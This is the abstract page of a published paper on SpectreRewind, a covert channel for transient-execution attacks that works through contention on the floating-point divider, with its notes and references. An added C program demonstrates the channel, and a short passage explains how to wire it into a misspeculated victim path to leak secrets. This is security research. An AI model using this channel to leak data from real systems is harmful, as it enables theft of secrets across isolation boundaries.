
A framework for leaking secrets to past instructions

  • Regular Paper
  • Journal of Cryptographic Engineering

Abstract

Transient execution attacks use microarchitectural covert channels to leak secrets that should not have been accessible during logical program execution. Commonly used microarchitectural covert channels are those that leave lasting footprints in the microarchitectural state, for example, a cache state change, from which the secret is recovered after the transient execution is completed. In this paper, we present SpectreRewind, a new approach to create and exploit contention-based covert channels for transient execution attacks. In our approach, a covert channel is established by issuing the necessary instructions logically before the transiently executed victim code. Unlike prior contention-based covert channels, which require simultaneous multi-threading (SMT), SpectreRewind works on a single hardware thread and does not require SMT. We show that contention on the floating point division unit on commodity out-of-order processors can be used to create a high-performance (~100 KB/s), low-noise covert channel for transient execution attacks instead of commonly used flush+reload-based cache covert channels. We also show that the proposed covert channel works in the JavaScript sandbox environment of a Chrome browser and can be used in a Meltdown attack.
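The following C program is an added example, not the authors' PoC (note 1 links that) and not code from the paper. It models the channel the abstract describes on one hardware thread, outside any transient window: the receiver times a chain of dependent double-precision divisions, and the sender's independent divisions are placed logically after the receiver's second timestamp. Because RDTSCP waits only for earlier instructions, the out-of-order core dispatches the sender's divisions while the chain is still executing; they compete for the divider and stretch the chain's measured latency, so the receiver learns whether the sender divided without any cache footprint. The chain length (32), the number of sender divisions (64), the trial count (201) and the inline-asm x86-64 path with a best-effort fallback for other ISAs are assumptions of this example, not values from the paper.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define CHAIN_LEN   32    /* dependent divisions in the receiver chain (assumption) */
#define SENDER_DIVS 64    /* independent divisions a sender issues for bit 1 (assumption) */
#define TRIALS      201   /* odd trial count so the median is a single sample */

#if defined(__x86_64__)
#include <x86intrin.h>
/* RDTSCP waits for all earlier instructions to execute, but later instructions
 * (the sender's divisions) may already be in flight: the property the channel
 * relies on. An LFENCE here would serialize and close the channel. */
static inline uint64_t stamp(void) { unsigned aux; return __rdtscp(&aux); }
/* A volatile asm keeps each divsd in program order and un-foldable. */
#define DIVSD(acc, d) __asm__ volatile("divsd %1, %0" : "+x"(acc) : "x"(d))
#else
#include <time.h>
/* Best-effort fallback for other ISAs (assumption): monotonic clock and a plain
 * division behind a compiler barrier; divider contention is not guaranteed. */
static inline uint64_t stamp(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#define DIVSD(acc, d) do { (acc) /= (d); __asm__ volatile("" ::: "memory"); } while (0)
#endif

static double sink;   /* keeps the division results live */

/* Receiver: time CHAIN_LEN dependent divisions. The sender's `sender_divs`
 * independent divisions come logically AFTER the second timestamp, yet the
 * out-of-order core dispatches them while the chain is still executing, so
 * they compete for the divider and lengthen t1 - t0. */
static uint64_t time_chain(int sender_divs) {
    volatile double divisor = 1.000001;       /* volatile: not constant-folded */
    double d = divisor;
    double chain = 1e300, s0 = 1e300, s1 = 1e300, s2 = 1e300, s3 = 1e300;

    uint64_t t0 = stamp();
    for (int i = 0; i < CHAIN_LEN; i++)
        DIVSD(chain, d);                      /* each division depends on the last */
    uint64_t t1 = stamp();                    /* retires once the chain is done */

    for (int i = 0; i < sender_divs; i += 4) { /* sender: four independent streams */
        DIVSD(s0, d); DIVSD(s1, d); DIVSD(s2, d); DIVSD(s3, d);
    }
    sink = chain + s0 + s1 + s2 + s3;
    return t1 - t0;
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of n samples (sorts v in place); robust against interrupts and
 * frequency changes that would skew a mean. */
static uint64_t median(uint64_t *v, int n) {
    qsort(v, (size_t)n, sizeof v[0], cmp_u64);
    return v[n / 2];
}

static uint64_t measure_median(int sender_divs) {
    uint64_t v[TRIALS];
    for (int i = 0; i < TRIALS; i++) v[i] = time_chain(sender_divs);
    return median(v, TRIALS);
}

/* Decision threshold: halfway between the quiet and the contended chain. */
static uint64_t calibrate_threshold(void) {
    uint64_t quiet = measure_median(0);
    uint64_t busy  = measure_median(SENDER_DIVS);
    return (quiet + busy) / 2;
}

static int decode_bit(uint64_t cycles, uint64_t threshold) {
    return cycles > threshold;   /* slower chain => sender was dividing => 1 */
}

/* Send one byte, MSB first: a 1 bit issues SENDER_DIVS divisions, a 0 bit none.
 * In the real attack the sender side is the victim's transient code. */
static unsigned char transmit_byte(unsigned char byte, uint64_t threshold) {
    unsigned char received = 0;
    for (int b = 7; b >= 0; b--) {
        int bit = (byte >> b) & 1;
        uint64_t t = measure_median(bit ? SENDER_DIVS : 0);
        received = (unsigned char)((received << 1) | decode_bit(t, threshold));
    }
    return received;
}

int main(void) {
    printf("quiet chain : %llu\n", (unsigned long long)measure_median(0));
    printf("busy chain  : %llu\n", (unsigned long long)measure_median(SENDER_DIVS));
    uint64_t thr = calibrate_threshold();
    unsigned char sent = 0xA5, got = transmit_byte(sent, thr);
    printf("sent 0x%02x, received 0x%02x (%s)\n", sent, got, sent == got ? "ok" : "errors");
    return 0;
}
```

Compile with `gcc -O2 -o rewind rewind.c` and run it on an Intel core. On parts whose divider is not fully pipelined the busy median sits visibly above the quiet one and the byte round-trips; if the two medians overlap, lengthen CHAIN_LEN or SENDER_DIVS until the gap is stable. The transient attack keeps the receiver side unchanged and replaces the sender loop with a secret-dependent division inside the victim's misspeculated path: the division executes before the squash, the contention it causes has already delayed the older chain, and the timestamps that were issued logically before it record the leak. Note 2's distinction matters here: the channel exploits the divider's throughput (the cycles before the unit accepts the next μop), not its latency.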




Notes

  1. Our PoC code is available at http://github.com/CSL-KU/SpectreRewind-POC.

  2. As defined in [1], latency refers to the clock cycles needed from the time the μop is issued to the time the result becomes available to dependent μops, while throughput refers to the clock cycles needed from the time the μop is issued until the time the functional unit becomes available again.

  3. https://github.com/IAIK/meltdown.

References

  1. Abel, A., Reineke, J.: uops.info: characterizing latency, throughput, and port usage of instructions on Intel microarchitectures. In: Architectural Support for Programming Languages and Operating Systems (ASPLOS), pp. 673–686. ACM, New York (2019)

  2. Aciicmez, O., Seifert, J.P.: Cheap hardware parallelism implies cheap security. In: Workshop on Fault Diagnosis and Tolerance in Cryptography (FDTC), pp. 80–91 (2007)

  3. ARM: Cortex-A72 Software Optimization Guide (2015). https://static.docs.arm.com/uan0016/a/cortex_a72_software_optimization_guide_external.pdf

  4. ARM: Cortex-A57 Software Optimization Guide (2016). https://static.docs.arm.com/uan0015/b/Cortex_A57_Software_Optimization_Guide_external.pdf

  5. Behnia, M., Sahu, P., Paccagnella, R., Yu, J., Zhao, Z., Zou, X., Unterluggauer, T., Torrellas, J., Rozas, C., Morrison, A., Mckeen, F., Liu, F., Gabor, R., Fletcher, C.W., Basak, A., Alameldeen, A.: Speculative interference attacks: breaking invisible speculation schemes. In: Architectural Support for Programming Languages and Operating Systems (ASPLOS) (2020)

  6. Bhattacharyya, A., Sandulescu, A., Neugschwandtner, M., Sorniotti, A., Falsafi, B., Payer, M., Kurmus, A.: SMoTherSpectre: exploiting speculative execution through port contention. In: ACM SIGSAC Conference on Computer and Communications Security (CCS), pp. 785–800 (2019)

  7. Boggs, D.D., Segelken, R., Cornaby, M., Fortino, N., Chaudhry, S., Khartikov, D., Mooley, A., Tuck, N., Vreugdenhil, G.: Memory type which is cacheable yet inaccessible by speculative instructions (2019). U.S. Patent App. 16,022,274

  8. ARM: Cache speculation side-channels. White Paper (2018)

  9. Cabrera Aldaya, A., Brumley, B.B., ul Hassan, S., Pereida García, C., Tuveri, N.: Port contention for fun and profit. In: IEEE Symposium on Security and Privacy (S&P) (2019)

  10. Canella, C., Van Bulck, J., Schwarz, M., Lipp, M., von Berg, B., Ortner, P., Piessens, F., Evtyushkin, D., Gruss, D.: A systematic evaluation of transient execution attacks and defenses. In: USENIX Security Symposium (2019)

  11. Fogh, A.: Covert Shotgun (2016). https://cyber.wtf/2016/09/27/covertshotgun/

  12. Fustos, J., Bechtel, M., Yun, H.: SpectreRewind: leaking secrets to past instructions. In: Proceedings of the 4th ACM Workshop on Attacks and Solutions in Hardware Security (ASHES), pp. 117–126 (2020)

  13. Fustos, J., Farshchi, F., Yun, H.: SpectreGuard: an efficient data-centric defense mechanism against Spectre attacks. In: Design Automation Conference (DAC), pp. 61–1 (2019)

  14. Gonzalez, A., Korpan, B., Zhao, J., Younis, E., Asanović, K.: Replicating and mitigating Spectre attacks on an open source RISC-V microarchitecture. In: 3rd Workshop on Computer Architecture Research with RISC-V (CARRV) (2019)

  15. Gras, B., Giuffrida, C., Kurth, M., Bos, H., Razavi, K.: ABSynthe: automatic blackbox side-channel synthesis on commodity microarchitectures. In: Network and Distributed System Security Symposium (NDSS) (2020)

  16. Horn, J.: speculative execution, variant 4: speculative store bypass (2018). https://bugs.chromium.org/p/project-zero/issues/detail?id=1528

  17. Intel: Intel Analysis of Speculative Execution Side Channels (Rev. 4.0). Tech. rep. (2018). https://software.intel.com/sites/default/files/managed/b9/f9/336983-Intel-Analysis-of-Speculative-Execution-Side-Channels-White-Paper.pdf

  18. Khasawneh, K.N., Koruyeh, E.M., Song, C., Evtyushkin, D., Ponomarev, D., Abu-Ghazaleh, N.: SafeSpec: banishing the Spectre of a Meltdown with leakage-free speculation. In: Design Automation Conference (DAC) (2019)

  19. Kiriansky, V., Waldspurger, C.: Speculative buffer overflows: attacks and defenses (2018). arXiv preprint arXiv:1807.03757

  20. Kocher, P., Horn, J., Fogh, A., Genkin, D., Gruss, D., Haas, W., Hamburg, M., Lipp, M., Mangard, S., Prescher, T., Schwarz, M., Yarom, Y.: Spectre attacks: exploiting speculative execution. In: IEEE Symposium on Security and Privacy (S&P). IEEE Computer Society (2019)

  21. Koruyeh, E.M., Khasawneh, K.N., Song, C., Abu-Ghazaleh, N.: Spectre returns! Speculation attacks using the return stack buffer. In: USENIX Workshop on Offensive Technologies (WOOT) (2018)

  22. Lipp, M., Schwarz, M., Gruss, D., Prescher, T., Haas, W., Fogh, A., Horn, J., Mangard, S., Kocher, P., Genkin, D., Yarom, Y., Hamburg, M.: Meltdown: reading kernel memory from user space. In: USENIX Security Symposium (2018)

  23. Maisuradze, G., Rossow, C.: ret2spec: speculative execution using return stack buffers. In: ACM SIGSAC Conference on Computer and Communications Security (CCS), pp. 2109–2122. ACM (2018)

  24. Minkin, M., Moghimi, D., Lipp, M., Schwarz, M., Van Bulck, J., Genkin, D., Gruss, D., Sunar, B., Piessens, F., Yarom, Y.: Fallout: reading kernel writes from user space. In: ACM SIGSAC Conference on Computer and Communications Security (CCS) (2019)

  25. Moghimi, A., Wichelmann, J., Eisenbarth, T., Sunar, B.: MemJam: a false dependency attack against constant-time crypto implementations. Int. J. Parallel Program. (2019)

  26. Oberman, S.F.: Floating point division and square root algorithms and implementation in the AMD-K7 microprocessor. In: IEEE Symposium on Computer Arithmetic (ARITH), pp. 106–115. IEEE (1999)

  27. Saileshwar, G., Qureshi, M.K.: CleanupSpec: an "undo" approach to safe speculation. In: International Symposium on Microarchitecture (MICRO), pp. 73–86. ACM (2019)

  28. Schwarz, M., Lipp, M., Canella, C., Schilling, R., Kargl, F., Gruss, D.: ConTExT: a generic approach for mitigating Spectre. In: Network and Distributed System Security Symposium (NDSS) (2020)

  29. Schwarz, M., Lipp, M., Moghimi, D., Van Bulck, J., Stecklina, J., Prescher, T., Gruss, D.: ZombieLoad: cross-privilege-boundary data sampling. In: ACM SIGSAC Conference on Computer and Communications Security (CCS) (2019)

  30. Schwarz, M., Maurice, C., Gruss, D., Mangard, S.: Fantastic timers and where to find them: high-resolution microarchitectural attacks in JavaScript. In: Kiayias, A. (ed.) Financial Cryptography and Data Security, pp. 247–267. Springer, Cham (2017)

  31. Stecklina, J., Prescher, T.: LazyFP: leaking FPU register state using microarchitectural side-channels (2018). arXiv preprint arXiv:1806.07480

  32. Sun, K., Branco, R., Hu, K.: A new memory type against speculative side channel attacks (2019). https://github.com/IntelSTORMteam/Papers

  33. Townley, D., Ponomarev, D.: SMT-COP: defeating side-channel attacks on execution units in SMT processors. In: 28th International Conference on Parallel Architectures and Compilation Techniques (PACT) (2019)

  34. Tromer, E., Osvik, D.A., Shamir, A.: Efficient cache attacks on AES, and countermeasures. J. Cryptol. 23, 37–71 (2010)

  35. Tullsen, D.M., Eggers, S.J., Levy, H.M.: Simultaneous multithreading: maximizing on-chip parallelism. In: International Symposium on Computer Architecture (ISCA), pp. 392–403. ACM (1995)

  36. Van Bulck, J., Minkin, M., Weisse, O., Genkin, D., Kasikci, B., Piessens, F., Silberstein, M., Wenisch, T.F., Yarom, Y., Strackx, R.: Foreshadow: extracting the keys to the Intel SGX kingdom with transient out-of-order execution. In: USENIX Security Symposium. USENIX Association (2018)

  37. Van Bulck, J., Moghimi, D., Schwarz, M., Lipp, M., Minkin, M., Genkin, D., Yarom, Y., Sunar, B., Gruss, D., Piessens, F.: LVI: hijacking transient execution through microarchitectural load value injection. In: 41st IEEE Symposium on Security and Privacy (S&P) (2020)

  38. van Schaik, S., Milburn, A., Österlund, S., Frigo, P., Maisuradze, G., Razavi, K., Bos, H., Giuffrida, C.: RIDL: rogue in-flight data load. In: IEEE Symposium on Security and Privacy (S&P) (2019)

  39. van Schaik, S., Minkin, M., Kwong, A., Genkin, D., Yarom, Y.: CacheOut: leaking data on Intel CPUs via cache evictions (2020). https://cacheoutattack.com/

  40. Wang, Z., Lee, R.B.: Covert and side channels due to processor architecture. In: Annual Computer Security Applications Conference (ACSAC), pp. 473–482 (2006)

  41. Weisse, O., Neal, I., Loughlin, K., Wenisch, T.F., Kasikci, B.: NDA: preventing speculative execution attacks at their source. In: 52nd IEEE/ACM International Symposium on Microarchitecture (MICRO), pp. 572–586 (2019)

  42. Weisse, O., Van Bulck, J., Minkin, M., Genkin, D., Kasikci, B., Piessens, F., Silberstein, M., Strackx, R., Wenisch, T.F., Yarom, Y.: Foreshadow-NG: breaking the virtual memory abstraction with transient out-of-order execution. Technical Report (2018)

  43. Yan, M., Choi, J., Skarlatos, D., Morrison, A., Fletcher, C.W., Torrellas, J.: InvisiSpec: making speculative execution invisible in the cache hierarchy. In: International Symposium on Microarchitecture (MICRO) (2018)

  44. Yarom, Y., Falkner, K.: Flush+Reload: a high resolution, low noise, L3 cache side-channel attack. In: 23rd USENIX Security Symposium (USENIX Security 14), pp. 719–732. USENIX Association, San Diego (2014)

  45. Yarom, Y., Genkin, D., Heninger, N.: CacheBleed: a timing attack on OpenSSL constant-time RSA. J. Cryptogr. Eng. (2017)

  46. Yu, J., Yan, M., Khyzha, A., Morrison, A., Torrellas, J., Fletcher, C.W.: Speculative taint tracking (STT): a comprehensive protection for speculatively accessed data. In: International Symposium on Microarchitecture (MICRO), pp. 954–968 (2019)


Acknowledgements

This research is supported in part by NSF Grant CNS 1718880 and NSA Science of Security Initiative Contract no. #H98230-18-D-0009.

Author information

Corresponding author

Correspondence to Heechul Yun.

Cite this article

Fustos, J., Bechtel, M. & Yun, H. A framework for leaking secrets to past instructions. J Cryptogr Eng 12, 461–473 (2022). https://doi.org/10.1007/s13389-022-00289-8
